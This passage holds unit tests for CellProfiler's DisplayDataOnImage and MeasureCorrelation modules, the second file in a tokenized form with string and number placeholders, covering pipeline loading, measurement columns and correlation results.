        self.assertTrue(isinstance(module, D.DisplayDataOnImage))
        self.assertEqual(module.objects_or_image, D.OI_OBJECTS)
        self.assertEqual(module.objects_name, "<STR_LIT>")
        self.assertEqual(
            module.measurement, "<STR_LIT>")
        self.assertEqual(module.image_name, "<STR_LIT>")
        self.assertEqual(module.display_image, "<STR_LIT>")
        self.assertEqual(module.font_size, <NUM_LIT:11>)
        self.assertEqual(module.decimals, <NUM_LIT:3>)
        self.assertEqual(module.saved_image_contents, D.E_IMAGE)
        self.assertEqual(module.offset, <NUM_LIT:1>)
        self.assertEqual(module.color_or_text, D.CT_COLOR)
        self.assertEqual(module.colormap, "<STR_LIT>")
        self.assertTrue(module.wants_image)
        self.assertEqual(module.color_map_scale_choice,
                         D.CMS_MANUAL)
        self.assertEqual(module.color_map_scale.min, <NUM_LIT>)
        self.assertEqual(module.color_map_scale.max, <NUM_LIT>)
        # The second module should use the measurement range for scaling.
        module = pipeline.modules()[<NUM_LIT:1>]
        self.assertEqual(module.color_map_scale_choice,
                         D.CMS_USE_MEASUREMENT_RANGE)

    def make_workspace(self, measurement, labels=None, image=None):
        """Build a workspace + configured module for one run.

        measurement - image measurement value (labels is None) or a
                      per-object measurement sequence.
        labels      - labels matrix; None selects image mode.
        image       - background image; a zero image is made if None.

        Returns (workspace, module).
        """
        object_set = cpo.ObjectSet()
        module = D.DisplayDataOnImage()
        module.module_num = <NUM_LIT:1>
        module.image_name.value = INPUT_IMAGE_NAME
        module.display_image.value = OUTPUT_IMAGE_NAME
        module.objects_name.value = OBJECTS_NAME
        m = cpmeas.Measurements()
        if labels is None:
            # Image mode: a single image-wide measurement.
            module.objects_or_image.value = D.OI_IMAGE
            m.add_image_measurement(MEASUREMENT_NAME, measurement)
            if image is None:
                image = np.zeros((<NUM_LIT:50>, <NUM_LIT>))
        else:
            # Object mode: per-object measurement plus object locations.
            module.objects_or_image.value = D.OI_OBJECTS
            o = cpo.Objects()
            o.segmented = labels
            object_set.add_objects(o, OBJECTS_NAME)
            m.add_measurement(OBJECTS_NAME, MEASUREMENT_NAME, np.array(measurement))
            y, x = centers_of_labels(labels)
            m.add_measurement(OBJECTS_NAME, "<STR_LIT>", x)
            m.add_measurement(OBJECTS_NAME, "<STR_LIT>", y)
            if image is None:
                image = np.zeros(labels.shape)
        module.measurement.value = MEASUREMENT_NAME
        pipeline = cpp.Pipeline()

        def callback(caller, event):
            self.assertFalse(isinstance(event, cpp.RunExceptionEvent))
        pipeline.add_listener(callback)
        pipeline.add_module(module)
        image_set_list = cpi.ImageSetList()
        image_set = image_set_list.get_image_set(<NUM_LIT:0>)
        image_set.add(INPUT_IMAGE_NAME, cpi.Image(image))
        workspace = cpw.Workspace(pipeline, module, image_set, object_set,
                                  m, image_set_list)
        return workspace, module

    def test_02_01_display_image(self):
        """Run in image mode for each saved-image-contents option."""
        for display in (D.E_AXES, D.E_FIGURE, D.E_IMAGE):
            workspace, module = self.make_workspace(<NUM_LIT:0>)
            module.saved_image_contents.value = display
            module.run(workspace)
            # Smoke test: the output image must have been produced.
            image = workspace.image_set.get_image(OUTPUT_IMAGE_NAME)

    def test_02_02_display_objects(self):
        """Run in object mode with three labeled objects."""
        labels = np.zeros((<NUM_LIT:50>, <NUM_LIT>), int)
        labels[<NUM_LIT:10>:<NUM_LIT:20>, <NUM_LIT:20>:<NUM_LIT>] = <NUM_LIT:1>
        labels[<NUM_LIT:30>:<NUM_LIT>, <NUM_LIT>:<NUM_LIT:50>] = <NUM_LIT:2>
        labels[<NUM_LIT:5>:<NUM_LIT>, <NUM_LIT>:<NUM_LIT:100>] = <NUM_LIT:3>
        for display in (D.E_AXES, D.E_FIGURE, D.E_IMAGE):
            workspace, module = self.make_workspace([<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>], labels)
            module.saved_image_contents.value = display
            module.run(workspace)
            image = workspace.image_set.get_image(OUTPUT_IMAGE_NAME)

    def test_02_03_display_no_objects(self):
        """Run in object mode with an empty labels matrix (edge case)."""
        workspace, module = self.make_workspace([], np.zeros((<NUM_LIT:50>, <NUM_LIT>)))
        module.run(workspace)
        image = workspace.image_set.get_image(OUTPUT_IMAGE_NAME)

    def test_02_04_display_nan_objects(self):
        """Run with NaN measurements (some and all NaN)."""
        labels = np.zeros((<NUM_LIT:50>, <NUM_LIT>), int)
        labels[<NUM_LIT:10>:<NUM_LIT:20>, <NUM_LIT:20>:<NUM_LIT>] = <NUM_LIT:1>
        labels[<NUM_LIT:30>:<NUM_LIT>, <NUM_LIT>:<NUM_LIT:50>] = <NUM_LIT:2>
        labels[<NUM_LIT:5>:<NUM_LIT>, <NUM_LIT>:<NUM_LIT:100>] = <NUM_LIT:3>
        for measurements in (np.array([<NUM_LIT:1.0>, np.nan, <NUM_LIT>]), np.array([np.nan] * <NUM_LIT:3>)):
            workspace, module = self.make_workspace(measurements, labels)
            module.run(workspace)
            image = workspace.image_set.get_image(OUTPUT_IMAGE_NAME)

    def test_02_05_display_objects_wrong_size(self):
        """Run with a background image whose size differs from the labels."""
        labels = np.zeros((<NUM_LIT:50>, <NUM_LIT>), int)
        labels[<NUM_LIT:10>:<NUM_LIT:20>, <NUM_LIT:20>:<NUM_LIT>] = <NUM_LIT:1>
        labels[<NUM_LIT:30>:<NUM_LIT>, <NUM_LIT>:<NUM_LIT:50>] = <NUM_LIT:2>
        labels[<NUM_LIT:5>:<NUM_LIT>, <NUM_LIT>:<NUM_LIT:100>] = <NUM_LIT:3>
        input_image = np.random.uniform(size=(<NUM_LIT>, <NUM_LIT>))
        for display in (D.E_AXES, D.E_FIGURE, D.E_IMAGE):
            workspace, module = self.make_workspace([<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>], labels, input_image)
            module.saved_image_contents.value = display
            module.run(workspace)
            image = workspace.image_set.get_image(OUTPUT_IMAGE_NAME)

    def test_02_06_display_colors(self):
        """Run in color mode (objects colored by measurement)."""
        labels = np.zeros((<NUM_LIT:50>, <NUM_LIT>), int)
        labels[<NUM_LIT:10>:<NUM_LIT:20>, <NUM_LIT:20>:<NUM_LIT>] = <NUM_LIT:1>
        labels[<NUM_LIT:30>:<NUM_LIT>, <NUM_LIT>:<NUM_LIT:50>] = <NUM_LIT:2>
        labels[<NUM_LIT:5>:<NUM_LIT>, <NUM_LIT>:<NUM_LIT:100>] = <NUM_LIT:3>
        workspace, module = self.make_workspace([<NUM_LIT>, <NUM_LIT>, <NUM_LIT>], labels)
        assert isinstance(module, D.DisplayDataOnImage)
        module.color_or_text.value = D.CT_COLOR
        module.run(workspace)
        image = workspace.image_set.get_image(OUTPUT_IMAGE_NAME)

    def test_02_07_display_colors_missing_measurement(self):
        """Color mode with fewer measurements than objects (edge case)."""
        labels = np.zeros((<NUM_LIT:50>, <NUM_LIT>), int)
        labels[<NUM_LIT:10>:<NUM_LIT:20>, <NUM_LIT:20>:<NUM_LIT>] = <NUM_LIT:1>
        labels[<NUM_LIT:30>:<NUM_LIT>, <NUM_LIT>:<NUM_LIT:50>] = <NUM_LIT:2>
        labels[<NUM_LIT:5>:<NUM_LIT>, <NUM_LIT>:<NUM_LIT:100>] = <NUM_LIT:3>
        workspace, module = self.make_workspace([<NUM_LIT>, <NUM_LIT>], labels)
        assert isinstance(module, D.DisplayDataOnImage)
        module.color_or_text.value = D.CT_COLOR
        module.run(workspace)
        image = workspace.image_set.get_image(OUTPUT_IMAGE_NAME)

    def test_02_08_display_colors_nan_measurement(self):
        """Color mode with a NaN among the measurements."""
        labels = np.zeros((<NUM_LIT:50>, <NUM_LIT>), int)
        labels[<NUM_LIT:10>:<NUM_LIT:20>, <NUM_LIT:20>:<NUM_LIT>] = <NUM_LIT:1>
        labels[<NUM_LIT:30>:<NUM_LIT>, <NUM_LIT>:<NUM_LIT:50>] = <NUM_LIT:2>
        labels[<NUM_LIT:5>:<NUM_LIT>, <NUM_LIT>:<NUM_LIT:100>] = <NUM_LIT:3>
        workspace, module = self.make_workspace([<NUM_LIT>, np.nan, <NUM_LIT>], labels)
        assert isinstance(module, D.DisplayDataOnImage)
        module.color_or_text.value = D.CT_COLOR
        module.run(workspace)
        image = workspace.image_set.get_image(OUTPUT_IMAGE_NAME)

    def test_02_09_display_colors_manual(self):
        """Color mode with a manually-set color map scale."""
        labels = np.zeros((<NUM_LIT:50>, <NUM_LIT>), int)
        labels[<NUM_LIT:10>:<NUM_LIT:20>, <NUM_LIT:20>:<NUM_LIT>] = <NUM_LIT:1>
        labels[<NUM_LIT:30>:<NUM_LIT>, <NUM_LIT>:<NUM_LIT:50>] = <NUM_LIT:2>
        labels[<NUM_LIT:5>:<NUM_LIT>, <NUM_LIT>:<NUM_LIT:100>] = <NUM_LIT:3>
        workspace, module = self.make_workspace([<NUM_LIT>, <NUM_LIT>, <NUM_LIT>], labels)
        assert isinstance(module, D.DisplayDataOnImage)
        module.color_or_text.value = D.CT_COLOR
        module.color_map_scale_choice.value = D.CMS_MANUAL
        module.color_map_scale.min = <NUM_LIT>
        module.color_map_scale.max = <NUM_LIT>
        module.run(workspace)
        image = workspace.image_set.get_image(OUTPUT_IMAGE_NAME)
<s> '''<STR_LIT>''' <EOL> import base64 <EOL> import unittest <EOL> import zlib <EOL> from StringIO import StringIO <EOL> import numpy as np <EOL> from cellprofiler . preferences import set_headless <EOL> set_headless ( ) <EOL> import cellprofiler . pipeline as cpp <EOL> import cellprofiler . cpmodule as cpm <EOL> import cellprofiler . cpimage as cpi <EOL> import cellprofiler . measurements as cpmeas <EOL> import cellprofiler . objects as cpo <EOL> import cellprofiler . workspace as cpw <EOL> import cellprofiler . modules . measurecorrelation as M <EOL> IMAGE1_NAME = '<STR_LIT>' <EOL> IMAGE2_NAME = '<STR_LIT>' <EOL> OBJECTS_NAME = '<STR_LIT>' <EOL> class TestMeasureCorrelation ( unittest . TestCase ) : <EOL> def make_workspace ( self , image1 , image2 , objects = None ) : <EOL> '''<STR_LIT>''' <EOL> module = M . MeasureCorrelation ( ) <EOL> image_set_list = cpi . ImageSetList ( ) <EOL> image_set = image_set_list . get_image_set ( <NUM_LIT:0> ) <EOL> for image_group , name , image in zip ( module . image_groups , <EOL> ( IMAGE1_NAME , IMAGE2_NAME ) , <EOL> ( image1 , image2 ) ) : <EOL> image_group . image_name . value = name <EOL> image_set . add ( name , image ) <EOL> object_set = cpo . ObjectSet ( ) <EOL> if objects is None : <EOL> module . images_or_objects . value = M . M_IMAGES <EOL> else : <EOL> module . images_or_objects . value = M . M_IMAGES_AND_OBJECTS <EOL> module . object_groups [ <NUM_LIT:0> ] . object_name . value = OBJECTS_NAME <EOL> object_set . add_objects ( objects , OBJECTS_NAME ) <EOL> pipeline = cpp . Pipeline ( ) <EOL> workspace = cpw . Workspace ( pipeline , <EOL> module , <EOL> image_set , <EOL> object_set , <EOL> cpmeas . 
Measurements ( ) , <EOL> image_set_list ) <EOL> return workspace , module <EOL> def test_01_01_load_matlab ( self ) : <EOL> '''<STR_LIT>''' <EOL> data = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> fd = StringIO ( zlib . decompress ( base64 . b64decode ( data ) ) ) <EOL> pipeline = cpp . Pipeline ( ) <EOL> def callback ( caller , event ) : <EOL> self . assertFalse ( isinstance ( event , cpp . LoadExceptionEvent ) ) <EOL> pipeline . add_listener ( callback ) <EOL> pipeline . load ( fd ) <EOL> self . assertEqual ( len ( pipeline . modules ( ) ) , <NUM_LIT:4> ) <EOL> module = pipeline . modules ( ) [ - <NUM_LIT:1> ] <EOL> self . assertEqual ( module . images_or_objects . value , M . M_IMAGES_AND_OBJECTS ) <EOL> self . assertEqual ( module . image_count . value , <NUM_LIT:2> ) <EOL> for name in [ x . image_name . value for x in module . image_groups ] : <EOL> self . assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( module . object_count . value , <NUM_LIT:2> ) <EOL> for name in [ x . object_name . value for x in module . object_groups ] : <EOL> self . 
assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def test_01_02_load_v1 ( self ) : <EOL> '''<STR_LIT>''' <EOL> data = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> fd = StringIO ( zlib . decompress ( base64 . b64decode ( data ) ) ) <EOL> pipeline = cpp . Pipeline ( ) <EOL> def callback ( caller , event ) : <EOL> self . assertFalse ( isinstance ( event , cpp . LoadExceptionEvent ) ) <EOL> pipeline . add_listener ( callback ) <EOL> pipeline . load ( fd ) <EOL> self . assertEqual ( len ( pipeline . modules ( ) ) , <NUM_LIT:4> ) <EOL> module = pipeline . modules ( ) [ - <NUM_LIT:1> ] <EOL> self . assertEqual ( module . images_or_objects . value , M . M_IMAGES_AND_OBJECTS ) <EOL> self . assertEqual ( module . image_count . value , <NUM_LIT:2> ) <EOL> for name in [ x . image_name . value for x in module . image_groups ] : <EOL> self . assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( module . object_count . value , <NUM_LIT:2> ) <EOL> for name in [ x . object_name . value for x in module . object_groups ] : <EOL> self . assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def test_01_03_load_v2 ( self ) : <EOL> data = r"""<STR_LIT>""" <EOL> fd = StringIO ( data ) <EOL> pipeline = cpp . Pipeline ( ) <EOL> def callback ( caller , event ) : <EOL> self . assertFalse ( isinstance ( event , cpp . LoadExceptionEvent ) ) <EOL> pipeline . add_listener ( callback ) <EOL> pipeline . load ( fd ) <EOL> self . assertEqual ( len ( pipeline . 
modules ( ) ) , <NUM_LIT:4> ) <EOL> module = pipeline . modules ( ) [ - <NUM_LIT:1> ] <EOL> self . assertEqual ( module . images_or_objects . value , M . M_IMAGES_AND_OBJECTS ) <EOL> self . assertEqual ( module . image_count . value , <NUM_LIT:2> ) <EOL> self . assertEqual ( module . thr , <NUM_LIT> ) <EOL> for name in [ x . image_name . value for x in module . image_groups ] : <EOL> self . assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( module . object_count . value , <NUM_LIT:2> ) <EOL> for name in [ x . object_name . value for x in module . object_groups ] : <EOL> self . assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def test_01_04_load_v3 ( self ) : <EOL> data = r"""<STR_LIT>""" <EOL> fd = StringIO ( data ) <EOL> pipeline = cpp . Pipeline ( ) <EOL> def callback ( caller , event ) : <EOL> self . assertFalse ( isinstance ( event , cpp . LoadExceptionEvent ) ) <EOL> pipeline . add_listener ( callback ) <EOL> pipeline . load ( fd ) <EOL> self . assertEqual ( len ( pipeline . modules ( ) ) , <NUM_LIT:1> ) <EOL> module = pipeline . modules ( ) [ - <NUM_LIT:1> ] <EOL> self . assertEqual ( module . images_or_objects . value , M . M_IMAGES_AND_OBJECTS ) <EOL> self . assertEqual ( module . image_count . value , <NUM_LIT:2> ) <EOL> self . assertEqual ( module . thr , <NUM_LIT> ) <EOL> for name in [ x . image_name . value for x in module . image_groups ] : <EOL> self . assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( module . object_count . value , <NUM_LIT:2> ) <EOL> for name in [ x . object_name . value for x in module . object_groups ] : <EOL> self . assertTrue ( name in [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> all_object_measurement_formats = [ <EOL> M . F_CORRELATION_FORMAT , M . F_COSTES_FORMAT , M . F_K_FORMAT , <EOL> M . F_MANDERS_FORMAT , M . F_OVERLAP_FORMAT , M . F_RWC_FORMAT ] <EOL> all_image_measurement_formats = all_object_measurement_formats + [ <EOL> M . 
F_SLOPE_FORMAT ] <EOL> asymmetrical_measurement_formats = [ <EOL> M . F_COSTES_FORMAT , M . F_K_FORMAT , M . F_MANDERS_FORMAT , M . F_RWC_FORMAT ] <EOL> def test_02_01_get_categories ( self ) : <EOL> '''<STR_LIT>''' <EOL> module = M . MeasureCorrelation ( ) <EOL> module . image_groups [ <NUM_LIT:0> ] . image_name . value = IMAGE1_NAME <EOL> module . image_groups [ <NUM_LIT:1> ] . image_name . value = IMAGE2_NAME <EOL> module . object_groups [ <NUM_LIT:0> ] . object_name . value = OBJECTS_NAME <EOL> module . images_or_objects . value = M . M_IMAGES <EOL> def cat ( name ) : <EOL> return module . get_categories ( None , name ) == [ "<STR_LIT>" ] <EOL> self . assertTrue ( cat ( "<STR_LIT>" ) ) <EOL> self . assertFalse ( cat ( OBJECTS_NAME ) ) <EOL> module . images_or_objects . value = M . M_OBJECTS <EOL> self . assertFalse ( cat ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( cat ( OBJECTS_NAME ) ) <EOL> module . images_or_objects . value = M . M_IMAGES_AND_OBJECTS <EOL> self . assertTrue ( cat ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( cat ( OBJECTS_NAME ) ) <EOL> def test_02_02_get_measurements ( self ) : <EOL> '''<STR_LIT>''' <EOL> module = M . MeasureCorrelation ( ) <EOL> module . image_groups [ <NUM_LIT:0> ] . image_name . value = IMAGE1_NAME <EOL> module . image_groups [ <NUM_LIT:1> ] . image_name . value = IMAGE2_NAME <EOL> module . object_groups [ <NUM_LIT:0> ] . object_name . value = OBJECTS_NAME <EOL> module . images_or_objects . value = M . M_IMAGES <EOL> def meas ( name ) : <EOL> ans = list ( module . get_measurements ( None , name , "<STR_LIT>" ) ) <EOL> ans . sort ( ) <EOL> if name == "<STR_LIT>" : <EOL> mf = self . all_image_measurement_formats <EOL> else : <EOL> mf = self . all_object_measurement_formats <EOL> expected = sorted ( [ _ . split ( "<STR_LIT:_>" ) [ <NUM_LIT:1> ] for _ in mf ] ) <EOL> return ans == expected <EOL> self . assertTrue ( meas ( "<STR_LIT>" ) ) <EOL> self . assertFalse ( meas ( OBJECTS_NAME ) ) <EOL> module . images_or_objects . 
value = M . M_OBJECTS <EOL> self . assertFalse ( meas ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( meas ( OBJECTS_NAME ) ) <EOL> module . images_or_objects . value = M . M_IMAGES_AND_OBJECTS <EOL> self . assertTrue ( meas ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( meas ( OBJECTS_NAME ) ) <EOL> def test_02_03_get_measurement_images ( self ) : <EOL> '''<STR_LIT>''' <EOL> for iocase , names in ( <EOL> ( M . M_IMAGES , [ cpmeas . IMAGE ] ) , <EOL> ( M . M_OBJECTS , [ OBJECTS_NAME ] ) , <EOL> ( M . M_IMAGES_AND_OBJECTS , [ cpmeas . IMAGE , OBJECTS_NAME ] ) ) : <EOL> module = M . MeasureCorrelation ( ) <EOL> module . image_groups [ <NUM_LIT:0> ] . image_name . value = IMAGE1_NAME <EOL> module . image_groups [ <NUM_LIT:1> ] . image_name . value = IMAGE2_NAME <EOL> module . object_groups [ <NUM_LIT:0> ] . object_name . value = OBJECTS_NAME <EOL> module . images_or_objects . value = iocase <EOL> for name , mfs in ( ( cpmeas . IMAGE , self . all_image_measurement_formats ) , <EOL> ( OBJECTS_NAME , self . all_object_measurement_formats ) ) : <EOL> if name not in names : <EOL> continue <EOL> for mf in mfs : <EOL> ftr = mf . split ( "<STR_LIT:_>" ) [ <NUM_LIT:1> ] <EOL> ans = module . get_measurement_images ( <EOL> None , name , "<STR_LIT>" , ftr ) <EOL> expected = [ "<STR_LIT>" % ( i1 , i2 ) for i1 , i2 in <EOL> ( ( IMAGE1_NAME , IMAGE2_NAME ) , <EOL> ( IMAGE2_NAME , IMAGE1_NAME ) ) ] <EOL> if mf in self . asymmetrical_measurement_formats : <EOL> self . assertTrue ( all ( [ e in ans for e in expected ] ) ) <EOL> else : <EOL> self . assertTrue ( any ( [ e in ans for e in expected ] ) ) <EOL> def test_02_04_01_get_measurement_columns_images ( self ) : <EOL> module = M . MeasureCorrelation ( ) <EOL> module . image_groups [ <NUM_LIT:0> ] . image_name . value = IMAGE1_NAME <EOL> module . image_groups [ <NUM_LIT:1> ] . image_name . value = IMAGE2_NAME <EOL> module . object_groups [ <NUM_LIT:0> ] . object_name . value = OBJECTS_NAME <EOL> module . images_or_objects . value = M . 
M_IMAGES <EOL> columns = module . get_measurement_columns ( None ) <EOL> expected = [ <EOL> ( cpmeas . IMAGE , <EOL> ftr % ( IMAGE1_NAME , IMAGE2_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . all_image_measurement_formats ] + [ <EOL> ( cpmeas . IMAGE , <EOL> ftr % ( IMAGE2_NAME , IMAGE1_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . asymmetrical_measurement_formats ] <EOL> self . assertEqual ( len ( columns ) , len ( expected ) ) <EOL> for column in columns : <EOL> self . assertTrue ( any ( [ all ( [ cf == ef for cf , ef in zip ( column , ex ) ] ) <EOL> for ex in expected ] ) ) <EOL> def test_02_04_02_get_measurement_columns_objects ( self ) : <EOL> module = M . MeasureCorrelation ( ) <EOL> module . image_groups [ <NUM_LIT:0> ] . image_name . value = IMAGE1_NAME <EOL> module . image_groups [ <NUM_LIT:1> ] . image_name . value = IMAGE2_NAME <EOL> module . object_groups [ <NUM_LIT:0> ] . object_name . value = OBJECTS_NAME <EOL> module . images_or_objects . value = M . M_OBJECTS <EOL> columns = module . get_measurement_columns ( None ) <EOL> expected = [ <EOL> ( OBJECTS_NAME , <EOL> ftr % ( IMAGE1_NAME , IMAGE2_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . all_object_measurement_formats ] + [ <EOL> ( OBJECTS_NAME , <EOL> ftr % ( IMAGE2_NAME , IMAGE1_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . asymmetrical_measurement_formats ] <EOL> self . assertEqual ( len ( columns ) , len ( expected ) ) <EOL> for column in columns : <EOL> self . assertTrue ( any ( [ all ( [ cf == ef for cf , ef in zip ( column , ex ) ] ) <EOL> for ex in expected ] ) ) <EOL> def test_02_04_03_get_measurement_columns_both ( self ) : <EOL> module = M . MeasureCorrelation ( ) <EOL> module . image_groups [ <NUM_LIT:0> ] . image_name . value = IMAGE1_NAME <EOL> module . image_groups [ <NUM_LIT:1> ] . image_name . value = IMAGE2_NAME <EOL> module . object_groups [ <NUM_LIT:0> ] . object_name . value = OBJECTS_NAME <EOL> module . 
images_or_objects . value = M . M_IMAGES_AND_OBJECTS <EOL> columns = module . get_measurement_columns ( None ) <EOL> expected = [ <EOL> ( cpmeas . IMAGE , <EOL> ftr % ( IMAGE1_NAME , IMAGE2_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . all_image_measurement_formats ] + [ <EOL> ( cpmeas . IMAGE , <EOL> ftr % ( IMAGE2_NAME , IMAGE1_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . asymmetrical_measurement_formats ] + [ <EOL> ( OBJECTS_NAME , <EOL> ftr % ( IMAGE1_NAME , IMAGE2_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . all_object_measurement_formats ] + [ <EOL> ( OBJECTS_NAME , <EOL> ftr % ( IMAGE2_NAME , IMAGE1_NAME ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for ftr in self . asymmetrical_measurement_formats ] <EOL> self . assertEqual ( len ( columns ) , len ( expected ) ) <EOL> for column in columns : <EOL> self . assertTrue ( any ( [ all ( [ cf == ef for cf , ef in zip ( column , ex ) ] ) <EOL> for ex in expected ] ) ) <EOL> def test_03_01_correlated ( self ) : <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> image = np . random . uniform ( size = ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> i1 = cpi . Image ( image ) <EOL> i2 = cpi . Image ( image ) <EOL> workspace , module = self . make_workspace ( i1 , i2 ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , cpmeas . IMAGE , "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( cpmeas . IMAGE , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertAlmostEqual ( corr , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( m . get_object_names ( ) ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( m . get_object_names ( ) [ <NUM_LIT:0> ] , cpmeas . IMAGE ) <EOL> columns = module . get_measurement_columns ( None ) <EOL> features = m . get_feature_names ( cpmeas . IMAGE ) <EOL> self . assertEqual ( len ( columns ) , len ( features ) ) <EOL> for column in columns : <EOL> self . 
assertTrue ( column [ <NUM_LIT:1> ] in features ) <EOL> def test_03_02_anticorrelated ( self ) : <EOL> '''<STR_LIT>''' <EOL> i , j = np . mgrid [ <NUM_LIT:0> : <NUM_LIT:10> , <NUM_LIT:0> : <NUM_LIT:10> ] <EOL> image1 = ( ( i + j ) % <NUM_LIT:2> ) . astype ( float ) <EOL> image2 = <NUM_LIT:1> - image1 <EOL> i1 = cpi . Image ( image1 ) <EOL> i2 = cpi . Image ( image2 ) <EOL> workspace , module = self . make_workspace ( i1 , i2 ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , cpmeas . IMAGE , "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( cpmeas . IMAGE , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertAlmostEqual ( corr , - <NUM_LIT:1> ) <EOL> def test_04_01_slope ( self ) : <EOL> '''<STR_LIT>''' <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> image1 = np . random . uniform ( size = ( <NUM_LIT:10> , <NUM_LIT:10> ) ) . astype ( np . float32 ) <EOL> image2 = image1 * <NUM_LIT> <EOL> i1 = cpi . Image ( image1 ) <EOL> i2 = cpi . Image ( image2 ) <EOL> workspace , module = self . make_workspace ( i1 , i2 ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , cpmeas . IMAGE , "<STR_LIT>" , "<STR_LIT>" ) <EOL> slope = m . get_current_measurement ( cpmeas . IMAGE , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> if mi [ <NUM_LIT:0> ] == "<STR_LIT>" % ( IMAGE1_NAME , IMAGE2_NAME ) : <EOL> self . assertAlmostEqual ( slope , <NUM_LIT> , <NUM_LIT:5> ) <EOL> else : <EOL> self . assertAlmostEqual ( slope , <NUM_LIT:2> ) <EOL> def test_05_01_crop ( self ) : <EOL> '''<STR_LIT>''' <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> image1 = np . random . uniform ( size = ( <NUM_LIT:20> , <NUM_LIT:20> ) ) <EOL> i1 = cpi . Image ( image1 ) <EOL> crop_mask = np . zeros ( ( <NUM_LIT:20> , <NUM_LIT:20> ) , bool ) <EOL> crop_mask [ <NUM_LIT:5> : <NUM_LIT:16> , <NUM_LIT:5> : <NUM_LIT:16> ] = True <EOL> i2 = cpi . 
Image ( image1 [ <NUM_LIT:5> : <NUM_LIT:16> , <NUM_LIT:5> : <NUM_LIT:16> ] , crop_mask = crop_mask ) <EOL> workspace , module = self . make_workspace ( i1 , i2 ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , cpmeas . IMAGE , "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( cpmeas . IMAGE , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertAlmostEqual ( corr , <NUM_LIT:1> ) <EOL> def test_05_02_mask ( self ) : <EOL> '''<STR_LIT>''' <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> image1 = np . random . uniform ( size = ( <NUM_LIT:20> , <NUM_LIT:20> ) ) <EOL> mask1 = np . ones ( ( <NUM_LIT:20> , <NUM_LIT:20> ) , bool ) <EOL> mask1 [ <NUM_LIT:5> : <NUM_LIT:8> , <NUM_LIT:8> : <NUM_LIT:12> ] = False <EOL> mask2 = np . ones ( ( <NUM_LIT:20> , <NUM_LIT:20> ) , bool ) <EOL> mask2 [ <NUM_LIT> : <NUM_LIT> , <NUM_LIT:2> : <NUM_LIT:5> ] = False <EOL> mask = mask1 & mask2 <EOL> image2 = image1 . copy ( ) <EOL> image2 [ ~ mask ] = <NUM_LIT:1> - image1 [ ~ mask ] <EOL> i1 = cpi . 